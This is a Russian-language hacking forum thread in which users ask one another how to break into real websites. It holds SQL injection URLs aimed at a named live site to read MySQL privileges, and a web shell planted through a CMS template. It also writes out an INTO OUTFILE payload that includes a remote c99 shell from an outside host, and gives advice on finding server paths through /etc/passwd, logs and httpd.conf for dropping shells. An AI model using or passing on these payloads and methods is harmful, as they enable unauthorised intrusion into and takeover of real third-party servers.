Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    да я это видел но нигде нету конкретного примера
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    а никто тебе конкретно не даст...а приват палить никто не будет (если он есть)..
     
  3. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    Вот нашел, в метасплойт есть, попробуем! )
     
  4. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Залил шелл через админку кмс (засунул шелл в шаблон)

    захожу на него все ок - шелл полностью работает.

    дальше заливаю шелл отдельно от шаблона, файл залился

    НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0.

    т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет.

    дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку.

    все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл.

    safe mode выключен, все папки открыты на запись, вобщем свиду все нормально...

    система freebsd

    помогите, не знаю что и думать :(
     
    #16344 [R]eD, 12 Mar 2011
    Last edited: 12 Mar 2011
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    .htaccess
     
  6. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    В .htaccess ничего нету кроме AddDeafultCharset UTF-8

    // мда.. сломал сайт вобщем, подожду пока админы поправят чтобы еще попробывать что-нибудь...
     
    #16346 [R]eD, 12 Mar 2011
    Last edited: 12 Mar 2011
  7. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    подскажите, как вывести file_priv?
    пробую
    http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,file_priv,4,5,6,7,8+from+mysql.user+where+user=0x755f6e6577686f72697a6f6e--
    никак не получаетса
     
  8. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    с чего ты решил что у тебя доступ к ней?
    http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,3,4,5,6,7,8+from+mysql.user--+
     
    1 person likes this.
  9. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    как узнать полный путь от сервера к сайту ? есть доступ к pma
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    почти всегда есть файл phpinfo.php в корневой директории пма (если админ не удалил,то оно там лежит по дефолту)

    http://site.com/phpmyadmin/phpinfo.php
     
    _________________________
    #16350 Konqi, 12 Mar 2011
    Last edited: 12 Mar 2011
  11. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    увы, такого не имеется( а точней выбивает белую страницу пустую
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    нужно быть авторизованным в ПМА, для заглядывания пхпинфо
     
    _________________________
  13. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    я авторизован, всеравно белая страница
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    какая там версия ПМА ? пробуйте раскрытие путей из этой темы

    http://forum.antichat.net/thread50669.html

    если есть привилегии чтения/запись файлов для твоего пользователя mysql, пробуй читать лог файлы
     
    _________________________
    1 person likes this.
  15. Compton

    Compton Member

    Joined:
    31 Jan 2010
    Messages:
    290
    Likes Received:
    25
    Reputations:
    0
    почти такой же вопрос. как узнать путь для заливки шелла (/home/www/img/shell.php),если ошибки в основном вида
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 10000' at line 1
    . Права file_priv есть
     
    #16355 Compton, 12 Mar 2011
    Last edited: 12 Mar 2011
  16. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    Версия MySQL-клиента: 5.0.51a
    при раскрытии любых указаных путей в той теме отображается пустая страница даже без ошибки

    сайт с инклудом ../../../../var/www/default/mysql_data.php
    пробовал SELECT '<? @include("http://xxx.ru/c99.txt"); ?>' into outfile '/var/www/tmp/c99.php'
     
  17. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    в /tmp/ сразу залил

    и еще один тупой впорос как теперь сам шелл юзануть?
     
  18. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    kemtipp.ru ломаешь?
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Несколько вариантов:
    1) Просканить сканером директорий с целью найти phpinfo или файл который открыть по прямому пути выдает ошибку.
    2) Вставить спецсимволы в сесии\куки в надежде, что они не проверяються и ошибки не выключены. Выведет ошибку с путем.
    3) Раз уж есть file_priv, то читайте /etc/passwd. Найти там путь возможно. Или найти access_log (error_log), там тоже могут быть пути, и если пути такого плана: /usr/sitename.ru/www то просто вставить вместо sitename.ru доменное имя уязвимого сайта. Или опять же проскать через load_file в поисках httpd.conf, там есть деректива, в которой указан путь обычно или виртуальный хост хотя бы.
    4) Поиск вывода ошибок на соседних сайтах найденных через Reverse IP. Если путь вида, в котором учавствует доменное имя, то включаем логику ;) Если же путь типа /usr/user100500/www то пробовать по-другому найти.
    Но раз уж есть file_priv, то через /etc/passwd возможно найти путь ;)
     
  20. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    я не вандал, только в учебных целях)

    залил я шелл таким образом SELECT '<? @include("http://xxx.ru/c99.txt"); ?>' into outfile '/tmp/c99.php'

    как теперь в него зайти
     
Loading...
Thread Status:
Not open for further replies.